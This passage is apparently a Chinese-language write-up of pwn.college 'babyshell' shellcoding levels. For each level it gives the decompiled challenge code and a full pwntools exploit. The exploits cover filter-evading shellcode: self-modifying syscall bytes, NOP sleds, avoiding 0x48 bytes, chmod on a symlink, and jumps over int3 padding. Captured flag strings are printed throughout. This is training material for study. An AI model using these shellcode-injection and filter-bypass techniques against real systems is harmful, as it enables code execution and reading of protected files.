    or r10, 0xfffffff
    xor rax, rax
    or rax, 0x28
    syscall

    dec rdi
    xor rax, rax
    or rax, 0x3c
    syscall
        """
    )

    return shellcode


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

pwntools 自动生成的代码已经避免了 \x00，非常方便～

def construct_payload():
    shellcode = shellcraft.cat("/flag")

    return asm(shellcode)

Flag

Flag: pwn.college{gZQWA0hDKCz5Xn8KrcsIiwIX2aZ.0VOxIDL5cTNxgzW}

Level 4

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but your inputted data is filtered before execution.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+28h] [rbp-18h]
  int k; // [rsp+2Ch] [rbp-14h]
  const char **i; // [rsp+30h] [rbp-10h]
  const char **j; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x2D632000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)761470976 )
    __assert_fail("shellcode == (void *)0x2d632000", "/challenge/babyshell-level-4.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2D632000);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-4.c", 0x67u, "main");
  puts("Executing filter...\n");
  puts("This challenge requires that your shellcode have no H bytes!\n");
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
  {
    if ( *((_BYTE *)shellcode + k) == 0x48 )
    {
      printf("Failed filter at byte %d!\n", k);
      exit(1);
    }
  }
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_251D);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

显然，这次不允许我们使用 64-bit 汇编写 shellcode。Why？Cuz 64-bit 汇编指令本质上就是 32-bit 汇编的拓展，大多数指令都以前缀 0x48 开始。easy peasy!

push、pop 指令没有 0x48 前缀，可以正常使用。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-4"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = asm(
        """
    lea ebx, [eip+0x2c]
    xor ecx, esi
    xor edx, edx
    mov eax, 0x5
    int 0x80

    mov ebx, 0x1
    mov ecx, eax
    xor edx, edx
    mov esi, 0x1000
    mov eax, 0xbb
    int 0x80

    mov ebx, 0x0
    mov eax, 0x1
    int 0x80

flag:
    .string "/flag"
        """
    )

    return shellcode


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

这里再提供一种写法：

.global _start
.intel_syntax noprefix

_start:
  push 0x2f
  mov dword ptr [rsp + 1], 0x67616c66
  push rsp
  pop rdi
  xor esi, esi
  xor edx, edx
  mov al, 0x2
  syscall

  mov edi, 0x1
  mov esi, eax
  xor edx, edx
  mov r10, 0x1000
  mov al, 0x28
  syscall

  xor edi, edi
  mov al, 0x3c
  syscall

由于这题只是不想让我们用 64-bit 的指令，所以我们不能简单的通过 pwntools 生成 32-bit 指令来解决。这样生成出来的指令无法执行，我估计是内存对齐问题导致？因为这个程序本生是 amd64 的。

Flag

Flag: pwn.college{wqf2fgp7CVvoI3yhbzzsqtw5OC3.0FMyIDL5cTNxgzW}

Level 5

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), can you defeat this?

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+20h] [rbp-20h]
  int k; // [rsp+24h] [rbp-1Ch]
  const char **i; // [rsp+28h] [rbp-18h]
  const char **j; // [rsp+30h] [rbp-10h]
  _WORD *v11; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x1A315000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)439439360 )
    __assert_fail("shellcode == (void *)0x1a315000", "/challenge/babyshell-level-5.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x1A315000);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-5.c", 0x67u, "main");
  puts("Executing filter...\n");
  puts(
    "This challenge requires that your shellcode does not have any `syscall`, 'sysenter', or `int` instructions. System calls");
  puts("are too dangerous! This filter works by scanning through the shellcode for the following byte sequences: 0f05");
  puts("(`syscall`), 0f34 (`sysenter`), and 80cd (`int`). One way to evade this is to have your shellcode modify itself to");
  puts("insert the `syscall` instructions at runtime.\n");
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
  {
    v11 = (char *)shellcode + k;
    if ( *v11 == 0x80CD || *v11 == 0x340F || *v11 == 0x50F )
    {
      printf("Failed filter at byte %d!\n", k);
      exit(1);
    }
  }
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_2675);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

不让出现系统调用原语的机器码，绕过方法非常 ez 啊，请看 exp。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-5"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = """
    /* push b'/flag\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    /* call open('rsp', 'O_RDONLY', 'rdx') */
    push 2 /* 2 */
    pop rax
    mov rdi, rsp
    xor esi, esi /* O_RDONLY */
    inc byte ptr [rip + 1]
    .byte 0x0f, 0x04
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40 /* 0x28 */
    pop rax
    push 1
    pop rdi
    cdq /* rdx=0 */
    inc byte ptr [rip + 1]
    .byte 0x0f, 0x04
    """

    return asm(shellcode)


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{AJ-22D5IQdnex2KL8LxB8zOq02R.0VMyIDL5cTNxgzW}

Level 6

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), this challenge adds an extra layer of difficulty!

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+20h] [rbp-20h]
  int k; // [rsp+24h] [rbp-1Ch]
  const char **i; // [rsp+28h] [rbp-18h]
  const char **j; // [rsp+30h] [rbp-10h]
  _WORD *v11; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x26E45000, 0x2000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)652496896 )
    __assert_fail("shellcode == (void *)0x26e45000", "/challenge/babyshell-level-6.c", 0x62u, "main");
  printf("Mapped 0x2000 bytes for shellcode at %p!\n", (const void *)0x26E45000);
  puts("Reading 0x2000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x2000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-6.c", 0x67u, "main");
  puts("Executing filter...\n");
  puts(
    "This challenge requires that your shellcode does not have any `syscall`, 'sysenter', or `int` instructions. System calls");
  puts("are too dangerous! This filter works by scanning through the shellcode for the following byte sequences: 0f05");
  puts("(`syscall`), 0f34 (`sysenter`), and 80cd (`int`). One way to evade this is to have your shellcode modify itself to");
  puts("insert the `syscall` instructions at runtime.\n");
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
  {
    v11 = (char *)shellcode + k;
    if ( *v11 == 0x80CD || *v11 == 0x340F || *v11 == 0x50F )
    {
      printf("Failed filter at byte %d!\n", k);
      exit(1);
    }
  }
  puts("Removing write permissions from first 4096 bytes of shellcode.\n");
  if ( mprotect(shellcode, 0x1000uLL, 5) )
    __assert_fail(
      "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0",
      "/challenge/babyshell-level-6.c",
      0x79u,
      "main");
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
 puts(&byte_26ED);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

还是没难度。首先不允许出现系统调用原语的机器码，其次会在执行 shellcode 前移除前 0x1000 字节区块的写权限。由于我们的 shellcode 会去修改自生的指令来绕过不允许出现系统调用原语的机器码，所以肯定不能把 shellcoded 写在前 0x1000 字节的区块中，因为程序读了 0x2000 字节，所以我们把核心代码写到前 0x1000 字节之后即可。至于这前 0x1000 字节，我们一个 nop 滑铲滑过去就好了。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, pause, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-6"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(sled_length):
    shellcode = shellcraft.nop() * sled_length
    shellcode += """
    /* push b'/flag\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f
    xor [rsp], rax
    /* call open('rsp', 'O_RDONLY', 'rdx') */
    push 2 /* 2 */
    pop rax
    mov rdi, rsp
    xor esi, esi /* O_RDONLY */
    inc byte ptr [rip + 1]
    .byte 0x0f, 0x04
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
    mov r10d, 0x7fffffff
    mov rsi, rax
    push 40 /* 0x28 */
    pop rax
    push 1
    pop rdi
    cdq /* rdx=0 */
    inc byte ptr [rip + 1]
    .byte 0x0f, 0x04
    """

    return asm(shellcode)


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(0x1000)

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{kfVRmOzEaLCMSxdS_zQkxZr6BEv.0lMyIDL5cTNxgzW}

Level 7

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but all file descriptors (including stdin, stderr and stdout!) are closed.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+2Ch] [rbp-14h]
  const char **i; // [rsp+30h] [rbp-10h]
  const char **j; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x2483B000, 0x4000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)612610048 )
    __assert_fail("shellcode == (void *)0x2483b000", "/challenge/babyshell-level-7.c", 0x62u, "main");
  printf("Mapped 0x4000 bytes for shellcode at %p!\n", (const void *)0x2483B000);
  puts("Reading 0x4000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x4000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-7.c", 0x67u, "main");
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(byte_24A5);
  puts(
    "This challenge is about to close stdin, which means that it will be harder to pass in a stage-2 shellcode. You will need");
  puts("to figure an alternate solution (such as unpacking shellcode in memory) to get past complex filters.\n");
  if ( fclose(stdin) )
    __assert_fail("fclose(stdin) == 0", "/challenge/babyshell-level-7.c", 0x6Fu, "main");
  puts(
    "This challenge is about to close stderr, which means that you will not be able to use file descriptor 2 for output.\n");
  if ( fclose(stderr) )
    __assert_fail("fclose(stderr) == 0", "/challenge/babyshell-level-7.c", 0x72u, "main");
  puts(
    "This challenge is about to close stdout, which means that you will not be able to use file descriptor 1 for output. You");
  puts("will see no further output, and will need to figure out an alternate way of communicating data back to yourself.\n");
  if ( fclose(stdout) )
    __assert_fail("fclose(stdout) == 0", "/challenge/babyshell-level-7.c", 0x76u, "main");
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

~开玩笑，没有输入输出错误流还能困得住我不成 LOL~

请原谅我肚子饿了，实在懒得写思路了，现在只想快快恰饭，所以请师傅看 exp。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-7"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
        target.recvall(timeout=5)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = shellcraft.open("/flag")
    shellcode += """
    /* push out_fd */
    push rax
    """
    shellcode += shellcraft.open("./flag", "O_WRONLY | O_CREAT", 0o0644)
    shellcode += """
    /* sendfile('rax', '[rsp+8]', 0, 0x1000) */
    mov rdi, rax
    mov rsi, [rsp+0x8]
    xor rdx, rdx
    mov r10, 0x1000
    mov rax, SYS_sendfile
    syscall
    """
    shellcode += shellcraft.exit(0)

    return asm(shellcode)


def attack(target, payload):
    send_payload(target, payload)

    try:
        with open("./flag", "r") as file:
            content = file.read()

            log.success(content)
    except FileNotFoundError:
        log.error("The file './flag' does not exist.")
    except PermissionError:
        log.error("Permission denied to read './flag'.")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

其实这题用 chmod 写起来更简单一点呢。

Flag

Flag: pwn.college{Y3UgyYnfUmoR24PWDDkCs1W8h92.01MyIDL5cTNxgzW}

Level 8

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but you only get 18 bytes.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+2Ch] [rbp-14h]
  const char **i; // [rsp+30h] [rbp-10h]
  const char **j; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x205B4000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)542851072 )
    __assert_fail("shellcode == (void *)0x205b4000", "/challenge/babyshell-level-8.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x205B4000);
  puts("Reading 0x12 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x12uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-8.c", 0x67u, "main");
  puts("Removing write permissions from first 4096 bytes of shellcode.\n");
  if ( mprotect(shellcode, 0x1000uLL, 5) )
    __assert_fail(
      "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0",
      "/challenge/babyshell-level-8.c",
      0x6Au,
      "main");
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_251D);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

这题在读取数据大小上做了限制，只允许读入 18 bytes。并且读完后把 buf 的写权限移除了，因此我们不能通过类似 read 的这种 shellcode 把再读数据到别的地方之类的。execve 肯定也不可能了，明显会超过 18 bytes。这时候我们发现 chmod 是一个很不错的候选，但是不能直接对 /flag 使用 chmod，不然还是会超。不过既然超的原因是文件名太长，那我们不妨试试建立一个名称短一点的软链接，对软链接进行操作。实测发现对软链接使用 chmod 会影响到源文件的权限。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, os, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-8"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
        target.recvall(timeout=5)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = shellcraft.chmod("f", 0o4)

    return asm(shellcode)


def attack(target, payload):
    os.system("ln -s /flag f")
    send_payload(target, payload)

    try:
        with open("./f", "r") as file:
            content = file.read()

            log.success(content)
    except FileNotFoundError:
        log.error("The file './f' does not exist.")
    except PermissionError:
        log.error("Permission denied to read './f'.")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{swqZOtc9CdQUIFCMwrec4E5WBCi.0FNyIDL5cTNxgzW}

Level 9

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but your input has data inserted into it before being executed.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+28h] [rbp-18h]
  int k; // [rsp+2Ch] [rbp-14h]
  const char **i; // [rsp+30h] [rbp-10h]
  const char **j; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x2A207000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)706768896 )
    __assert_fail("shellcode == (void *)0x2a207000", "/challenge/babyshell-level-9.c", 0x62u, "main");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2A207000);
  puts("Reading 0x1000 bytes from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-9.c", 0x67u, "main");
  puts("Executing filter...\n");
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
  {
    if ( k / 10 % 2 == 1 )
      *((_BYTE *)shellcode + k) = -52;
  }
  puts("This challenge modified your shellcode by overwriting every other 10 bytes with 0xcc. 0xcc, when interpreted as an");
  puts(
    "instruction is an `INT 3`, which is an interrupt to call into the debugger. You must avoid these modifications in your");
  puts("shellcode.\n");
  puts("Removing write permissions from first 4096 bytes of shellcode.\n");
  if ( mprotect(shellcode, 0x1000uLL, 5) )
    __assert_fail(
      "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0",
      "/challenge/babyshell-level-9.c",
      0x76u,
      "main");
  puts("This challenge is about to execute the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_2635);
  puts("Executing shellcode!\n");
  ((void (*)(void))shellcode)();
  puts("### Goodbye!");
  return 0;
}

这题每隔 0xa 字节使用 0xa 个 int3 中断替换 0xa 字节的指令。简单吧，每隔 0xa 字节给它塞 0xa 个 nop 好了，随它换。在此之前使用一条 jmp 跳转到 int3 之后确保不被 int3 干扰，继续执行就好了。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, os, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyshell-level-9"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
        target.recvall(timeout=5)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    shellcode = """
    /* chmod(file='f', mode=4) */
    /* push b'f\x00' */
    push 0x66
    mov rdi, rsp
    push 4
    pop rsi
    /* call chmod() */
    jmp continue
    .rept 0xa
        nop
    .endr
continue:
    push 90 /* 0x5a */
    pop rax
    syscall
    """

    return asm(shellcode)


def attack(target, payload):
    os.system("ln -s /flag f")
    send_payload(target, payload)

    try:
        with open("./f", "r") as file:
            content = file.read()

            log.success(content)
    except FileNotFoundError:
        log.error("The file './f' does not exist.")
    except PermissionError:
        log.error("Permission denied to read './f'.")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{YzFX3cOrT5abYZfD8oqct1wr3xc.0VNyIDL5cTNxgzW}

Level 10

Information

Category: Pwn

Description

Write and execute shellcode to read the flag, but your input is sorted before being executed!

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+28h] [rbp-38h]
  int k; // [rsp+2Ch] [rbp-34h]
  int m; // [rsp+30h] [rbp-30h]
  int v10; // [rsp+34h] [rbp-2Ch]
  const char **i; // [rsp+38h] [rbp-28h]
  const char **j; // [rsp+40h] [rbp-20h]
  _QWORD *v13; // [rsp+48h] [rbp-18h]
  __int64 v14; // [rsp+50h] [rbp-10h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts(
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
  puts(
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
  puts(
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  shellcode = mmap((void *)0x24AA2000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)615129088 )
